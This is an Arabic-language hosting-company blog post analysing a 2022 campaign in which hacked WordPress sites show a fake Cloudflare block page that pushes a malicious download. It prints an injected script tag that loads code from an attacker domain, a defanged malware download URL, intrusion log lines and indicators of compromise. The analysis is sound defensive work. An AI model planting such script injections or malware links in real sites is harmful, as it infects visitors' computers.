Wordpressالأمن الألكتروني

صفحة حظر Cloudflare المخادعة قد تشير إلى اختراق موقعك WordPress

وصف العدوى

في 15 سبتمبر، تم إكتشاف حملة خبيثة. كان من الواضح أن المهاجمين الذين تم إكتشافهم كانوا يستخدمون تقنيات التصيد الاحتيالي لخداع المستخدمين لتنزيل ملف ثنائي ضار. استخدموا رسالة مزيفة على مواقع الويب تفيد بأنه تم حظر المستخدم بواسطة Cloudflare. وفي الوقت نفسه، فإن المواقع المصابة التي تتلقى الرسالة لن تستخدم بالضرورة خدمات Cloudflare.

ومع ذلك، بمجرد نقر المستخدم على هذه النافذة المنبثقة الزائفة، يتم تنزيل البرنامج الضار الثنائي على أجهزة الكمبيوتر الخاصة به. يؤدي النقر فوق الزر “Check the system” إلى تنزيل ملف ثنائي ضار (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9 ). هنا تم الكشف عن رابط التحميل:

# https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip

يبلغ حجم الأرشيف الذي يتم تنزيله 10 ميغابايت فقط، ولكن يتم تحميل ملف آخر غير المضغوط حوالي 700 ميغابايت. يبدو واضحًا أن المهاجمين تعمدوا توزيع أحجام الحزم بحيث يتم إخضاع هذه الملفات للرادار وألا تظهر على العديد من خدمات فحص الفيروسات عبر الإنترنت.

ناقلات الهجوم

في جميع حالات الإصابة وجدنا ملفات تم حقنها في الووردبريس بهذه الأسماء. تبدو هكذا:

 ./wp-includes/js/jquery/jquery.js
 ./wp-includes/js/jquery/jquery.min.js

الحقن معتم بشدة للأسف، لكن يمكن اكتشافه إذا بحث المرء عن النمط التالي:

تقوم هذه الشفرة ، بعد تنفيذها ، بإدخال نص برمجي ضار آخر في الكود المصدري للصفحة:

<script src="https://gloogletag[.]com/tagged/ajax.js"> 

يقوم الكود الموضح أعلاه بتحميل كود HTML الخاص بنموذج Cloudflare المزيف باستخدام عنوان url التالي:

https://gloogletag[.]com/code/cloudflare.txt

عند اكتشاف هذه العدوى، ذهبنا لإجراء تحقيق. بعد فحص سجلات خادم الويب، اكتشفنا أن المتسللين استخدموا نفس الطريقة في جميع الحالات المسجلة.

لكي يبدأ هذا الهجوم، يحتاج المتسلل إلى الوصول إلى حساب مسؤول WordPress المخترق. بعد الحصول على إذن ناجح، يحتاج المهاجم إلى تثبيت المكون الإضافي wp-file-manager.

35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"

في جميع الحالات التي سجلناها، كان عنوان IP الخاص بالأجهزة التي نفذت هذا الهجوم هو نفسه: 35.184.195.84

مؤشرات تشير إلى الإختراق

gloogletag[.]com
35.184.195.84
fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9

كيفية حماية موقعك ووردبريس من العدوى

يرجى اتباع الخطوات التالية:

  • قم بتحديث البرنامج بشكل منتظم.
  • استخدم 2FA وكلمات مرور قوية
  • استخدم جدار حماية (Firewall).

نهتم في استضافة الدعم العربي بأمن البنية التحتية لديك. لذلك نسعى دائمًا لإبقائك على اطلاع دائم بجميع المعلومات اللازمة لحماية موقع الويب الخاص بك والتأكد من أن عملك يعمل بسلاسة في جميع الأوقات. من فضلك لا تتردد في الرد على أي أسئلة لديك حول حماية موقع الويب الخاص بك من أي نشاط ضار إلى فريق الدعم الخاص بنا.

المصدر

The deceptive Cloudflare block page that signals WordPress infection

Mohamed Elsayed

Senior Linux admin & Web developer

مقالات ذات صلة

اترك تعليق

زر الذهاب إلى الأعلى